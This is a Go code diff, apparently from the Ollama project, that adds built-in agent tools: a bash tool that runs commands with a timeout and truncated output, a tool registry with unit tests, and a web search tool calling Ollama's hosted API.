+	// Execute command
+	cmd := exec.CommandContext(ctx, "bash", "-c", command)
+
+	var stdout, stderr bytes.Buffer
+	cmd.Stdout = &stdout
+	cmd.Stderr = &stderr
+
+	err := cmd.Run()
+
+	// Build output
+	var sb strings.Builder
+
+	// Add stdout
+	if stdout.Len() > 0 {
+		output := stdout.String()
+		if len(output) > maxOutputSize {
+			output = output[:maxOutputSize] + "\n... (output truncated)"
+		}
+		sb.WriteString(output)
+	}
+
+	// Add stderr if present
+	if stderr.Len() > 0 {
+		stderrOutput := stderr.String()
+		if len(stderrOutput) > maxOutputSize {
+			stderrOutput = stderrOutput[:maxOutputSize] + "\n... (stderr truncated)"
+		}
+		if sb.Len() > 0 {
+			sb.WriteString("\n")
+		}
+		sb.WriteString("stderr:\n")
+		sb.WriteString(stderrOutput)
+	}
+
+	// Handle errors
+	if err != nil {
+		if ctx.Err() == context.DeadlineExceeded {
+			return sb.String() + "\n\nError: command timed out after 60 seconds", nil
+		}
+		// Include exit code in output but don't return as error
+		if exitErr, ok := err.(*exec.ExitError); ok {
+			return sb.String() + fmt.Sprintf("\n\nExit code: %d", exitErr.ExitCode()), nil
+		}
+		return sb.String(), fmt.Errorf("executing command: %w", err)
+	}
+
+	if sb.Len() == 0 {
+		return "(no output)", nil
+	}
+
+	return sb.String(), nil
+}

x/tools/registry.go

+// Package tools provides built-in tool implementations for the agent loop.
+package tools
+
+import (
+	"fmt"
+	"sort"
+
+	"github.com/ollama/ollama/api"
+)
+
+// Tool defines the interface for agent tools.
+type Tool interface {
+	// Name returns the tool's unique identifier.
+	Name() string
+	// Description returns a human-readable description of what the tool does.
+	Description() string
+	// Schema returns the tool's parameter schema for the LLM.
+	Schema() api.ToolFunction
+	// Execute runs the tool with the given arguments.
+	Execute(args map[string]any) (string, error)
+}
+
+// Registry manages available tools.
+type Registry struct {
+	tools map[string]Tool
+}
+
+// NewRegistry creates a new tool registry.
+func NewRegistry() *Registry {
+	return &Registry{
+		tools: make(map[string]Tool),
+	}
+}
+
+// Register adds a tool to the registry.
+func (r *Registry) Register(tool Tool) {
+	r.tools[tool.Name()] = tool
+}
+
+// Get retrieves a tool by name.
+func (r *Registry) Get(name string) (Tool, bool) {
+	tool, ok := r.tools[name]
+	return tool, ok
+}
+
+// Tools returns all registered tools in Ollama API format, sorted by name.
+func (r *Registry) Tools() api.Tools {
+	// Get sorted names for deterministic ordering
+	names := make([]string, 0, len(r.tools))
+	for name := range r.tools {
+		names = append(names, name)
+	}
+	sort.Strings(names)
+
+	var tools api.Tools
+	for _, name := range names {
+		tool := r.tools[name]
+		tools = append(tools, api.Tool{
+			Type:     "function",
+			Function: tool.Schema(),
+		})
+	}
+	return tools
+}
+
+// Execute runs a tool call and returns the result.
+func (r *Registry) Execute(call api.ToolCall) (string, error) {
+	tool, ok := r.tools[call.Function.Name]
+	if !ok {
+		return "", fmt.Errorf("unknown tool: %s", call.Function.Name)
+	}
+	return tool.Execute(call.Function.Arguments.ToMap())
+}
+
+// Names returns the names of all registered tools, sorted alphabetically.
+func (r *Registry) Names() []string {
+	names := make([]string, 0, len(r.tools))
+	for name := range r.tools {
+		names = append(names, name)
+	}
+	sort.Strings(names)
+	return names
+}
+
+// Count returns the number of registered tools.
+func (r *Registry) Count() int {
+	return len(r.tools)
+}
+
+// DefaultRegistry creates a registry with all built-in tools.
+func DefaultRegistry() *Registry {
+	r := NewRegistry()
+	r.Register(&WebSearchTool{})
+	r.Register(&BashTool{})
+	return r
+}

x/tools/registry_test.go

+package tools
+
+import (
+	"testing"
+
+	"github.com/ollama/ollama/api"
+)
+
+func TestRegistry_Register(t *testing.T) {
+	r := NewRegistry()
+
+	r.Register(&BashTool{})
+	r.Register(&WebSearchTool{})
+
+	if r.Count() != 2 {
+		t.Errorf("expected 2 tools, got %d", r.Count())
+	}
+
+	names := r.Names()
+	if len(names) != 2 {
+		t.Errorf("expected 2 names, got %d", len(names))
+	}
+}
+
+func TestRegistry_Get(t *testing.T) {
+	r := NewRegistry()
+	r.Register(&BashTool{})
+
+	tool, ok := r.Get("bash")
+	if !ok {
+		t.Fatal("expected to find bash tool")
+	}
+
+	if tool.Name() != "bash" {
+		t.Errorf("expected name 'bash', got '%s'", tool.Name())
+	}
+
+	_, ok = r.Get("nonexistent")
+	if ok {
+		t.Error("expected not to find nonexistent tool")
+	}
+}
+
+func TestRegistry_Tools(t *testing.T) {
+	r := NewRegistry()
+	r.Register(&BashTool{})
+	r.Register(&WebSearchTool{})
+
+	tools := r.Tools()
+	if len(tools) != 2 {
+		t.Errorf("expected 2 tools, got %d", len(tools))
+	}
+
+	for _, tool := range tools {
+		if tool.Type != "function" {
+			t.Errorf("expected type 'function', got '%s'", tool.Type)
+		}
+	}
+}
+
+func TestRegistry_Execute(t *testing.T) {
+	r := NewRegistry()
+	r.Register(&BashTool{})
+
+	// Test successful execution
+	args := api.NewToolCallFunctionArguments()
+	args.Set("command", "echo hello")
+	result, err := r.Execute(api.ToolCall{
+		Function: api.ToolCallFunction{
+			Name:      "bash",
+			Arguments: args,
+		},
+	})
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+	if result != "hello\n" {
+		t.Errorf("expected 'hello\\n', got '%s'", result)
+	}
+
+	// Test unknown tool
+	_, err = r.Execute(api.ToolCall{
+		Function: api.ToolCallFunction{
+			Name:      "unknown",
+			Arguments: api.NewToolCallFunctionArguments(),
+		},
+	})
+	if err == nil {
+		t.Error("expected error for unknown tool")
+	}
+}
+
+func TestDefaultRegistry(t *testing.T) {
+	r := DefaultRegistry()
+
+	if r.Count() != 2 {
+		t.Errorf("expected 2 tools in default registry, got %d", r.Count())
+	}
+
+	_, ok := r.Get("bash")
+	if !ok {
+		t.Error("expected bash tool in default registry")
+	}
+
+	_, ok = r.Get("web_search")
+	if !ok {
+		t.Error("expected web_search tool in default registry")
+	}
+}
+
+func TestBashTool_Schema(t *testing.T) {
+	tool := &BashTool{}
+
+	schema := tool.Schema()
+	if schema.Name != "bash" {
+		t.Errorf("expected name 'bash', got '%s'", schema.Name)
+	}
+
+	if schema.Parameters.Type != "object" {
+		t.Errorf("expected parameters type 'object', got '%s'", schema.Parameters.Type)
+	}
+
+	if _, ok := schema.Parameters.Properties.Get("command"); !ok {
+		t.Error("expected 'command' property in schema")
+	}
+}
+
+func TestWebSearchTool_Schema(t *testing.T) {
+	tool := &WebSearchTool{}
+
+	schema := tool.Schema()
+	if schema.Name != "web_search" {
+		t.Errorf("expected name 'web_search', got '%s'", schema.Name)
+	}
+
+	if schema.Parameters.Type != "object" {
+		t.Errorf("expected parameters type 'object', got '%s'", schema.Parameters.Type)
+	}
+
+	if _, ok := schema.Parameters.Properties.Get("query"); !ok {
+		t.Error("expected 'query' property in schema")
+	}
+}

x/tools/websearch.go

+package tools
+
+import (
+	"bytes"
+	"encoding/json"
+	"fmt"
+	"io"
+	"net/http"
+	"os"
+	"strings"
+	"time"
+
+	"github.com/ollama/ollama/api"
+)
+
+const (
+	webSearchAPI     = "https://ollama.com/api/web_search"
+	webSearchTimeout = 15 * time.Second
+)
+
+// WebSearchTool implements web search using Ollama's hosted API.
+type WebSearchTool struct{}
+
+// Name returns the tool name.
+func (w *WebSearchTool) Name() string {
+	return "web_search"
+}
+
+// Description returns a description of the tool.
+func (w *WebSearchTool) Description() string {
+	return "Search the web for current information. Use this when you need up-to-date information that may not be in your training data."
+}
+
+// Schema returns the tool's parameter schema.
+func (w *WebSearchTool) Schema() api.ToolFunction {
+	props := api.NewToolPropertiesMap()
+	props.Set("query", api.ToolProperty{
+		Type:        api.PropertyType{"string"},
+		Description: "The search query to look up on the web",
+	})
+	return api.ToolFunction{
+		Name:        w.Name(),
+		Description: w.Description(),
+		Parameters: api.ToolFunctionParameters{
+			Type:       "object",
+			Properties: props,
+			Required:   []string{"query"},
+		},
+	}
+}
+
+// webSearchRequest is the request body for the web search API.
+type webSearchRequest struct {
+	Query      string `json:"query"`
+	MaxResults int    `json:"max_results,omitempty"`
+}
+
+// webSearchResponse is the response from the web search API.
+type webSearchResponse struct {
+	Results []webSearchResult `json:"results"`
+}
+
+// webSearchResult is a single search result.
+type webSearchResult struct {
+	Title   string `json:"title"`
+	URL     string `json:"url"`
+	Content string `json:"content"`
+}
+
+// Execute performs the web search.
+func (w *WebSearchTool) Execute(args map[string]any) (string, error) {
+	query, ok := args["query"].(string)
+	if !ok || query == "" {
+		return "", fmt.Errorf("query parameter is required")
+	}
+
+	apiKey := os.Getenv("OLLAMA_API_KEY")
+	if apiKey == "" {
+		return "", fmt.Errorf("OLLAMA_API_KEY environment variable is required for web search")
+	}
+
+	// Prepare request
+	reqBody := webSearchRequest{
+		Query:      query,
+		MaxResults: 5,
+	}
+
+	jsonBody, err := json.Marshal(reqBody)
+	if err != nil {
+		return "", fmt.Errorf("marshaling request: %w", err)
+	}
+
+	req, err := http.NewRequest("POST", webSearchAPI, bytes.NewBuffer(jsonBody))
+	if err != nil {
+		return "", fmt.Errorf("creating request: %w", err)
+	}
+
+	req.Header.Set("Content-Type", "application/json")
+	req.Header.Set("Authorization", "Bearer "+apiKey)
+
+	// Send request
+	client := &http.Client{Timeout: webSearchTimeout}
+	resp, err := client.Do(req)
+	if err != nil {
+		return "", fmt.Errorf("sending request: %w", err)
+	}
+	defer resp.Body.Close()
+
+	body, err := io.ReadAll(resp.Body)
+	if err != nil {
+		return "", fmt.Errorf("reading response: %w", err)
+	}
+
+	if resp.StatusCode != http.StatusOK {
+		return "", fmt.Errorf("web search API returned status %d: %s", resp.StatusCode, string(body))
+	}
+
+	// Parse response
+	var searchResp webSearchResponse
+	if err := json.Unmarshal(body, &searchResp); err != nil {
+		return "", fmt.Errorf("parsing response: %w", err)
+	}
+
+	// Format results
+	if len(searchResp.Results) == 0 {
+		return "No results found for query: " + query, nil
+	}
+
+	var sb strings.Builder
+	sb.WriteString(fmt.Sprintf("Search results for: %s\n\n", query))
+
+	for i, result := range searchResp.Results {
+		sb.WriteString(fmt.Sprintf("%d. %s\n", i+1, result.Title))
+		sb.WriteString(fmt.Sprintf("   URL: %s\n", result.URL))
+		if result.Content != "" {
+			// Truncate long content (UTF-8 safe)
+			content := result.Content
+			runes := []rune(content)
+			if len(runes) > 300 {
+				content = string(runes[:300]) + "..."
+			}
+			sb.WriteString(fmt.Sprintf("   %s\n", content))
+		}
+		sb.WriteString("\n")
+	}
+
+	return sb.String(), nil
+}